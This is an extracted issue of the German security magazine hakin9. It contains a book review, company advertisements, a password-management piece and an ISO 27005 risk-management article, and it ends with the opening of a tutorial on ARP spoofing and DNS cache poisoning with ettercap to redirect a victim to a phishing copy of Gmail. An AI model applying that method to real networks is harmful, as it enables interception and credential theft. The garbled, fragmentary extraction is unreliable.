Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
News
hakin9orgde 29
Tausende Passwoumlrter von Usern und Administratoren sind im UmlaufMan stelle sich komplexe IT Landschaften vor die geo-
grafisch verteilt sind und viele Mitarbeiter die in verschie-
dene bdquoRollenldquo schluumlpfen Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen sondern auch
zum Internetbanking der FIBU Software und anderen
kaufmaumlnnischen Programmen wie SAP Interessant und
zunehmend komplex wird es bei den IT Administratoren
Natuumlrlich koumlnnen sich diese von vielen fuumlr ihre mathema-
tischen Faumlhigkeiten bewunderten auch nicht dutzende
von Passwoumlrtern merken sondern helfen etwas nach Pro
Anwendung wird ein Passwort vergeben das sich diese
dann fuumlr laumlngere Zeit im Gedaumlchtnis behalten Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar
ohne in technische Details gehen zu muumlssen ein Pass-
wort fuumlr laumlngere Zeit im Gedaumlchtnis
Guter Rat ist teuer - und umsonstRichtlinien zur Passwortgestaltung gibt es unzaumlhlige und
viele sind gut gemeint Die Laumlnge wird vorgegeben und
auch die zu verwendenden Zeichen die alle 4 Wochen
zu aumlndern sind und natuumlrlich nicht auf einem Post-It unter
der Tastatur kleben sollen Selbst wenn dies eingehal-
ten wird vergisst man sein neues Passwort spaumltestens
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich dass man wieder zuruumlck ist Auch der
Auditor ist zumindest milde gestimmt wenn die zentralen
Passwoumlrter zumindest in einer gesicherten Excel Liste
zusammengefasst sind Von IT Security sollte man aber
dabei besser nicht sprechen da jeder Administrator auf
alle Passwoumlrter zugreifen kann Spaumltestens bei automa-
tisierten (unattended) Passwoumlrtern die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen
sind verhaltensorientierte Ansaumltze obsolete
Passwortstruktur ist unbekanntKaum ein IT Verantwortlicher hat verlaumlssliche Informa-
tionen uumlber die Strukturen und Verbreitungsgrade von
Passwoumlrtern in einer Organisation Bei Implementie-
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt dass zehntausende privilegier-
te Administratorkonten vorhanden sind aber nur 20
davon als Administratorkonten dienen Der uumlberwiegen-
de Teil der Passwoumlrter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten die
in Skripts den Zugriff ermoumlglichen Und natuumlrlich nur in
seltensten Faumlllen geaumlndert werden und somit immer ei-
ne Hintertuumlre auch fuumlr den Ex-Mitarbeiter offenlassen
Die Passwort Autoritaumlt Freiwilligkeit und Empfehlungen sind nicht angebracht Die Zugangsberechtigungen sind als Schluumlssel fuumlr Safes
mit allen Geheimnissen der Organisation anzusehen Das
Ergebnis einer Reflektion der Problematik bdquoPasswoumlrterldquo
kann nur sein dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann Die Durchset-
zung der Passwoumlrter Policies Zuteilung von Einmal-Pass-
woumlrtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natuumlrlich ebenso ein Must-Have In Zeiten
wie diesen sollte es auf Knopfdruck moumlglich sein einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwoumlrter
fuumlr externe Dienstleister ausstellen zu koumlnnen
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr uumlberschaubaren Marktes - die Loumlsung
bdquoCloakware Password Authorityldquo Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstaumlrkt
Wetten dass Ihr groumlszligtes Betriebsgeheimnis ungeschuumltzt istWie ein schlechter Sickerwitz stellt man sich zuerst die Frage was ist unser groumlszligtes Betriebsgeheimnis Die Kundenlisten die Projektdokumentationen und Strategiepapiere die Zahlen auf den Bankkonten oder gar die private Telefonnummer vom Vorstandsvorsitzenden Schlussendlich sind es die Passwoumlrter und Zugangsberechtigungen auf saumlmtliche Anwendungen und Datenbanken in jedem Unternehmen oder Organisation
10201030
ABWEHR
In der heutigen Ausgabe werde ich Ihnen darstellen warum es nuumltzlich ist sich mit dem Risikomanage-ment der IT zu beschaumlftigen und dabei auf das Mo-
dell der ISO 27005 zuruumlck zu greifenAuf dieses Thema wurde bereits in einer fruumlheren
Ausgabe eingegangen in diesem Artikel wird aber mehr auf die Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen
Groumlszligere Unternehmen sind schon von Gesetz her verpflichtet sich mit dem Themenbereich Risiko-management zu beschaumlftigen (Aktiengesetz Kon-TraG GmbH-Gesetz uAuml) Ein Teil dieses Risikoma-nagements ist das IT-Risikomanagement welches sich ndash wie der Name es schon sagt ndash mit den Risi-ken im IT-Bereich beschaumlftigt Eine Problematik beim Risikomanagement allgemein und speziell bei der
IT-Risikomanagement ndash Wozu brauche ich das
In der letzten Ausgabe habe ich Ihnen ausfuumlhrlich die Norm ISOIEC 27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben Ein Teil dieser Familie ist die ISO 27005 die sich mit dem IT-Risikomanagement befasst
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
men
IEC 27001)
Andreas Lentwojt
Abbildung 1 Aufbau eines Risikomanagementsystems (allgemein)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 31
entgegenwirkt Richtlinien wie Basel II oder Euro-SOX fordern diese Ausrichtung seit langem
Die ISO 27005 ist branchen- und groumlszligenunabhaumlngig Somit koumlnnen auch kleinere und mittlere Unternehmen durch die Adaption der Inhalte auf die betrieblichen An-forderungen ein schlankes und effektives IT-Risikoma-nagement aufbauen Gerade sensible Branchen wie Automotive Healthcare Software oder Telekommuni-kation werden hier angesprochen Aufgrund aumlhnlicher Strukturen laumlsst sich die ISO 27005 ohne groumlszligeren Auf-wand in ein unternehmensweites Risikomanagement integrieren kann aber auch raquosololaquo umgesetzt werden Im Gegensatz zur ISOIEC 27001 ist die ISOIEC 27005 selbst nicht zertifizierbar
Kapitel 1 ndash Risikomanagementsystem allgemeinWie bei der ISO 27001 geht es auch bei der ISO 27005 nicht um das bdquowasldquo sondern um das bdquowieldquo Es ist ein Leitfaden zur Implementierung eines Risikoprozesses im Kontext der Informations- und Telekommunikations-technologie Wie sieht so ein Risikoprozess nun aus Ganz allgemein betrachtet geht es wiederum um ein Managementsystem welches aus 6 Schritten (vergl Abb 1) besteht
Informationstechnologie ist die Bewertung der er-kannten Risiken Bereits seit einigen Jahren gab es nationale Normen die sich mit einem standardisier-ten Vorgehensmodell beschaumlftigten Im Juni 2008 wurde daraus die international anerkannte Norm ISOIEC 270052008 (ehem BS 7799-32006) ISO 270052008 ist eine spezielle Auspraumlgung der ISOIEC 310002009 die sich mit dem Risikomanagement all-gemein befasst Die genauen Bezeichnungen lauten
les and guidelinesldquo
nagementldquo
Warum uumlberhaupt ein IT-Risikomanagementsystem im Unternehmens-Kontext
Datenverlust und -diebstahl gehoumlren zu den groumlszligten Problemen in Unternehmen Bisher bezog sich Risiko-management in Unternehmen hauptsaumlchlich auf Markt- und Adressrisiken sowie auf finanzielle Risikofaktoren Das Risikomanagement im IT-Bereich wurde weitgehend vernachlaumlssigt Dabei lassen sich Sicherheitsluumlcken mit-tels Risikomanagement aufdecken und minimieren was auch Regressforderungen an die Unternehmensfuumlhrung
Abbildung 2 Aufbau der ISO 270052008
10201032
ABWEHR
Kapitel 2 ndash Der Standard ISOIEC 270052008Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-se und zum Risikomanagement im IT Bereich dar Sie beinhaltet dabei einerseits eine Beschreibung des kom-pletten Risikomanagementprozesses als Ganzes und andererseits eine genaue Beschreibung der einzelnen Schritte des Risikomanagementprozesses und der Ri-sikoanalyse Die Anhaumlnge der IEC 27005 liefern zudem nuumltzliche Informationen zur Implementierung eines Ri-sikomanagementsystems im Bereich Informationssi-
Norm ISO 27001
gen auf bedrohte Werte direkte und indirekte Be-drohungen und Schwachstellen
schaumltzung der Risikowahrscheinlichkeit und des Ri-sikoniveaus
managementmaszlignahmen
Aus diesen einzelnen Kapiteln der Norm wird der IT-Sicherheitsprozess entwickelt (vergl Abb 3)
Kapitel 3 ndash Die Phasen
Defi nition der RahmenbedingungenIn einem ersten Schritt wird in einer Schutzbedarfsfest-stellung (High Level Risk Analysis) der Schutzbedarf fuumlr
Schutzbedarfskategorie niedrig bis hoch wird idR auf eine detaillierte Risikoanalyse verzichtet Dies erlaubt ei-ne schnelle und effektive Auswahl von grundlegenden Sicherheitsmaszlignahmen bei gleichzeitiger Gewaumlhrleis-tung eines angemessenen Schutzniveaus IT-Systeme der Schutzbedarfskategorie bdquosehr hoch sind einer de-taillierten Risikoanalyse zu unterziehen auf deren Basis individuelle Sicherheitsmaszlignahmen ausgewaumlhlt werden
Abbildung 3 Der Sicherheitsprozess gem ISO 270052008
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 33
Diese Option kombiniert die Vorteile des Grund-schutz- und des Risikoanalyseansatzes da alle IT-Systeme mit hohem Schutzbedarf wirksam und ange-messen geschuumltzt werden Maszlignahmen koumlnnen fuumlr die anderen Systeme mit Hilfe des Grundschutzes schnell und effektiv ausgewaumlhlt werden Diese Methode stellt in den meisten Einsatzumgebungen eine empfehlenswer-te Strategie zur Risikoanalyse dar
Zu den einzelnen Kriterien die festgelegt werden muumlssen gehoumlren ua
RisikobewertungDie Risikobewertung gliedert sich in die beiden Vor-gaumlnge Risikoanalyse und der Priorisierung der Risiken Die Risikoanalyse ist sicherlich der schwierigste und aufwendigste Teil muumlssen doch zunaumlchst die Risiken
-setsldquo des Unternehmens wird folgender Prozess durch-laufen
Dieser Prozess wird fuumlr alle Assets wiederholt Ein As-set im Sinne der ISO 27005 ist alles was einen Wert fuumlr die Organisation besitzt und daher schuumltzenswert
Rahmenbedingungen den zu betrachtenden Rahmen zunaumlchst eng zu fassen Er kann spaumlter immer noch erweitert werden Die Norm unterteilt hierbei in primauml-re Assets (Geschaumlftsprozesse und ndashaktivitaumlten Infor-mationen) und unterstuumltzende Assets (Hard- und Soft-ware Netzwerk Personal Infrastruktur etc) Eine de-
NormAus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine Risikoeinschaumltzung
--
wertung nach Zeitwert nach Wiederbeschaffungswert nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Ver-lust des Assets Immaterielle Werte werden idR nach dem Wert fuumlr einen potenziellen Angreifer oder nach dem Schaden fuumlr die Organisation aus einem Verlust des As-sets bewertet Bei der Bewertung ist zu beachten dass Wertekombinationen haumlufig nicht der Summe der Einzel-
werte entsprechen da sich die Werte in Kombination er-gaumlnzen und einen houmlheren Wert darstellen
Die zu schuumltzenden Werte sind vielfaumlltigen Be-drohungen ausgesetzt Im Rahmen der Risikoana-lyse ist nun die Eintrittswahrscheinlichkeit abzu-schaumltzen
Bedrohungen sind charakterisiert durch
-vorteile Rache)
-hung verursacht werden kann
-ben Blitzschlag ) liegen statistische Daten vor die fuumlr die Einschaumltzung hilfreich sein koumlnnen
Die Bedrohungsanalyse umfasst im Einzelnen
Bedrohungen koumlnnen unterteilt werden in
-sonalausfall)
-chende Dokumentation)
-nutzung oder -administration Nichtbeachtung von Sicherheitsmaszlignahmen)
-tentraumlger)
von Geraumlten Manipulation an Daten oder Software Viren trojanische Pferde)
Es ist wichtig alle wesentlichen Bedrohungen zu er-fassen da andernfalls Sicherheitsluumlcken bestehen bleiben koumlnnen Im Anhang C der Norm ist eine um-fangreiche Listung von Bedrohungen vorhanden je-doch kann keine derartige Liste vollstaumlndig sein Da-ruumlber hinaus sind auch Bedrohungen einem staumlndigen Wandel und einer staumlndigen Weiterentwicklung unter-worfen
Nachdem Werte und Bedrohungen erfasst wurden muss nun die Eintrittswahrscheinlichkeit zugeordnet werden Es ist also zu bestimmen mit welcher Wahr-scheinlichkeit eine Bedrohung im betrachteten Umfeld eintreten wird
Auch die Eintrittswahrscheinlichkeit kann quantita-tiv oder qualitativ bewertet werden Da eine quantita-
-taumluschen koumlnnte ist in den letzten Jahren ein Trend in Richtung qualitativer Bewertung zu erkennen
10201034
ABWEHR
Bewaumlhrt haben sich hier etwa drei- bis fuumlnfteilige Ska-len (zB 4 sehr haumlufig hellip 0 sehr selten)
Diese allgemeinen Bedeutungen der Skalenwerte koumlnnen fuumlr jeden einzelnen spezifischen Anwendungs-bereich konkretisiert werden
Nachdem Werte Bedrohungen und Eintrittswahr-scheinlichkeiten definiert sind wird eine Schwachstellen-analyse durchgefuumlhrt Unter einer Schwachstelle (Vulne-rability) versteht man eine Sicherheitsschwaumlche eines oder mehrerer Objekte die durch eine Bedrohung ausge-nuumltzt werden kann Eine Schwachstelle selbst verursacht noch keinen Schaden sie ist aber die Voraussetzung die es einer Bedrohung ermoumlglicht wirksam zu werden Typische Beispiele fuumlr Schwachstellen sind etwa
Mangelnder baulicher Schutz von Raumlumen mit IT-Ein-richtungen
heitsbewusstsein
Sicherheitsschwaumlchen und muss sowohl das Umfeld als auch bereits vorhandene Schutzmaszlignahmen mit einbeziehen Es ist wichtig jede Schwachstelle da-raufhin zu bewerten wie leicht es ist sie auszunutzen
Vor der eigentlichen Risikobewertung werden noch die bestehenden Sicherheitsmaszlignahmen betrachtet und bewertet Stellt sich heraus dass eine bereits exis-tierende oder geplante Maszlignahme ihren Anforderun-gen nicht gerecht wird so ist zu pruumlfen ob sie ersatz-los entfernt durch andere Maszlignahmen ersetzt oder aus Kostengruumlnden belassen werden soll
Im Rahmen dieses Schrittes sollte auch gepruumlft wer-den ob die bereits existierenden Sicherheitsmaszlignah-
staumlndig eingesetzte Sicherheitsmaszlignahmen stellen eine zusaumltzliche potentielle Schwachstelle eines Systems dar
Die eigentliche Risikobewertung ist nun das Zusammen-fuumlhren der in den vorherigen Abschnitten beschriebenen Maszlignahmen und die Erstellung einer Risikomatrix (vergl Abb 4) Darin werden die bewerteten Risiken gemaumlszlig ihres Risikopotenzials in einer Matrix angeordnet und dem ge-wuumlnschten SOLL gegenuumlber gestellt Im Anhang der Norm befinden sich einige Beispiele fuumlr eine Risikobewertung
Anhand der Risikomatrix erfolgt die Priorisierung der Risiken in Abhaumlngigkeit des zur Verfuumlgung stehenden Budgets und der Ressourcen
RisikobehandlungDie Phase der Risikobehandlung ist das bdquotaumlgliche Tunldquo
bezogen auf die Informationstechnologie das Ge-genuumlberstellen der Anforderungen aus der Risikobe-wertung mit dem Ergebnis der durchgefuumlhrten Maszlig-nahmen und eine neue Bewertung dieser vergl Abb 5
Die Optionen zur Risikobehandlung werden in 4 Ka-tegorien eingeteilt
bestimmter Maszlignahmen etc)
tiger Verfahren)
Risikouumlberwachung und ndashakzeptanzBasierend hierauf erfolgt eine neue Bewertung des Restrisikos und der Risikomanagementprozess geht
Abbildung 4 Beispielhafte Risikomatrix (Bildquelle HMP)
IT-Risikomanagement ndash Wozu brauche ich das
hakin9orgde 35
uumlber in die Risikouumlberwachung Diesen Ablauf ndash auch PDCA-Prozess genannt (Plan-Do-Check-Act) ndash ken-nen Sie bereits aus dem vorherigen Artikel uumlber die ISO 27001 Eine neue Bewertung ist ebenfalls durchzufuumlh-ren wenn sich Vorgaben aumlndern neue Assets imple-mentiert werden oder die Bedrohungssituation sich aumln-dert
Bei der Risikoakzeptanz ist es wichtig die Entschei-dungskriterien detailliert zu dokumentieren damit sich auch spaumlter noch nachvollziehbar sind
RisikoreportingSinn des Risikoreportings ist zum einen die Informati-on des Managements uumlber den aktuellen Stand der Ri-sikosituation und der eingeleiteten Maszlignahmen zum anderen dient diese natuumlrlich auch der Dokumentation Weitere Inhalte koumlnnen zB sein das Sicherheitsbe-wusstsein zu verbessern oder das Einfordern von Ent-scheidungen
Die Ergebnisse von Risikobewertungen sind idR vertraulich und dementsprechend zu handhaben
Kapitel 4 ndash Nutzen und FazitDie Einfuumlhrung eines Risikomanagementsystems nach ISOIEC 270052008 unterscheidet sich vom Prozess her nur in Teilbereichen von der Einfuumlhrung eines kompletten Risikomanagementsystems nach ISOIEC 31000 Jedoch ist der Aufwand wesentlich geringer da es sich nur um einen Teilbereich des Un-ternehmens handelt Auch hier gilt wieder der Grund-satz dass Unternehmen die bereits ein Qualitaumltsma-nagement-System im Einsatz haben (zB ISO 9001) weniger Zeit benoumltigen da ihnen die Prozess-orien-
tierte Denkweise und das strukturierte Vorgehen be-reits vertraut sind
Ohne Informations- und Kommunikationstechnik kann heute kaum noch ein Unternehmen auskommen auch nicht zeitweise Das gilt auch fuumlr kleinere und mitt-lere Unternehmen genauso wie fuumlr Groszligunternehmen und Konzerne Deshalb sollte das Management wissen welche Risiken gerade im IT-Bereich bestehen und wie diesen begegnet werden kann Gerade im Bereich der Informations- und Telekommunikationssysteme sind die immateriellen Werte also diejenigen Werte denen nicht eine Einkaufsrechnung gegenuumlbergelegt werden kann haumlufig kaum bekannt
Die Norm ISOIEC 270052008 bietet den Vorteil dass mit einem kleinen Teilbereich (zB Netzwerk) be-gonnen werden kann und sukzessive weitere Assets einbezogen werden koumlnnen Zudem bietet die Norm im Anhang Beispiele und Checklisten fuumlr das Vorgehen
Abbildung 5 Ablauf Risikobehandlung (Bildquelle CIS)
ANDREAS LENTWOJTDer Autor ist Managementberater CEO und Inhaber bdquoAL-Consultldquo Nach dem Studium der Betriebswirtschaft mit den Schwerpunkten Organisation und IT arbeitete er langjaumlhrig bei Banken und Finanzdienstleistern als Organisations-IT-Leiter und spaumlter als Security-Offi cer 2004 gruumlndete er das Beratungsunternehmen ALConsult mit den Schwerpunk-ten Security und Prozessmanagement Er ist zertifi zierter ISO 27001-Auditor und besitzt weitere Zertifi kate wie CObIT und ITIL Der Schwerpunkt der Beratung liegt im organisatori-schen Bereich und den Prozessen nicht auf der Technik
DNS Cache Poisoning
hakin9orgde 37
Vor einiger Zeit habe daruumlber geschrieben
wie man mit SET auf einfache Art und Wei-
se eine Java Applet Attacke durchfuumlhren
kann Dieser Artikel lies aber offen wie man das
Opfer auf die praumlparierte URL umleitet was mitun-
ter wahrscheinlich der schwierigste Teil des ganzen
Angriffes ist Damit eine solche Attacke aber auch
erfolgreich eingesetzt werden kann dient dieser Ar-
tikel als Ergaumlnzung um diese Informationsluumlcke zu
fuumlllen
Um ein Opfer auf eine praumlparierte Seite umzuleiten
ist DNS Cache Poisoning (auch DNS Spoofing ge-
nannt) eine effektive und schnelle Moumlglichkeit Darunter
versteht man ein Angriff wobei Eintraumlge in einem DNS
zu eigenen Gunsten manipuliert werden
Das Opfer merkt dabei im Idealfall nichts davon Die-
ses tippt wie uumlblich zum Beispiel wwwgooglech ein
nur anstatt bei der DNS-Abfrage die IP-Adresse der
Google-Server zuruumlckkommt erhaumllt das Opfer die IP-
Adresse einer praumlparierten Seite
DNS Cache Poisoning
Als Ergaumlnzung zu meinem ersten Artikel Java Applet Attacke erfahren wir hier wie wir ein Opfer mittels DNS Spoofing unbemerkt eine praumlparierte Seite unterschieben koumlnnen
IN DIESEM ARTIKEL ERFAHREN SIE WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
gement
Patrick Schmid
Abbildung 1 Eine Anfrage (rot) an Ziel
10201038
ANGRIFF
Wieder ein Beispiel dazu (Bild 2)
les nicht mehr die MAC-Adresse des Zieles son-
dern die des Angreifers zugeordnet ist
Paketes seinen ARP-Cache nach der MAC-Adres-
se des Zieles ab Aber anstatt von seinem ARP-
Cache auch die MAC-Adresse des Zieles zu erhal-
ten bekommt er die des Angreifers welche er in to-
taler Unwissenheit in sein Paket packt
Pakete aus und vergleicht diese mit seiner Zuord-
nungstabelle Anhand der MAC-Adresse (die des
Angreifers) sendet er das Paket an Port 2 und so-
mit an den Angreifer und nicht wie vom Opfer ge-
plant an das Ziel
Somit geht der Verkehr aber erst vom Opfer zum An-
greifer
Damit das Oper davon aber nichts merkt muss der
Angreifer die abgefangene Anfrage an das Ziel weiter-
leitenNun verlaumluft die Kommunikation schon vom Op-
fer uumlber den Angreifer zum Ziel
Damit man aber auch den gesamten Verkehr in die an-
dere Richtungen also Anfragen und Antworten mitkriegt
macht man ARP-Attacken immer auf den Client und den
Router Gateway gleichzeitig womit nun eine Kommuni-
kation vom Opfer uumlber den Angreifer zum Ziel und auch
wieder zuruumlck moumlglich ist Damit ist die Man-in-the-Middle-
Attacke komplett und der Angreifer ist in der Lage den
gesamten Netzwerkverkehr seines Opfers nicht nur ab-
zufangen und mit zuhoumlren sondern auch beliebig zu ver-
aumlndern was uns auch sogleich zu Schritt 2 bringt
Im ersten Artikel haben wir als Beispiel die Seite Gmail
kopiert und praumlpariert Also wollen wir auch gleich dort
anknuumlpfen
Fuumlr diese Attacke werden wir das Tool ettercap ver-
wenden da es relativ einfach aufgebaut ist dabei aber
trotzdem viele Einstellungsmoumlglichkeiten bietet
Unsere Attacke wird in zwei Stufen aufgebaut sein
Als erstes muumlssen wir das Opfer oder besser dessen
Computer dazu bringen seinen ganzen Traffic auf un-
seren Computer umzuleiten also eine sogenannte
Man-in-the-middle-Attacke ausfuumlhren
Dazu werden wir ARP Spoofing verwenden ARP ist
ein Protokoll auf Layer 2 (Sicherung) um anhand einer
IP-Adresse die zugehoumlrige MAC-Adresse abzufragen
Die Funktionsweise von ARP Spoofing ist einfach Der
Grund fuumlr dessen Erfolg ist der dynamische ARP-Cache
auf jedem Client und eine Zuordnungstabelle auf jedem
Switch Ein Switch fuumlhrt eine Zuordnungstabelle worin die
MAC-Adressen der angeschlossenen Geraumlte dem jeweili-
gem Port zugeordnet sind Diese gibt es deshalb weil ein
Switch somit genau weiss welches System an welchem
Port angeschlossen ist und somit auch an welchen Port
ein einzelnes Datenpaket weitergeleitet werden muss
Der Client fuumlhrt einen eigenen ARP-Cache worin er
eine MAC-Adresse einer IP-Adresse zuordnet sodass
er nicht vor jedem Versenden eines Paketes die MAC-
Adresse zu einer IP neu abfragen muss
Veranschaulicht koumlnnte das dann so ablaufen (Bild 1)
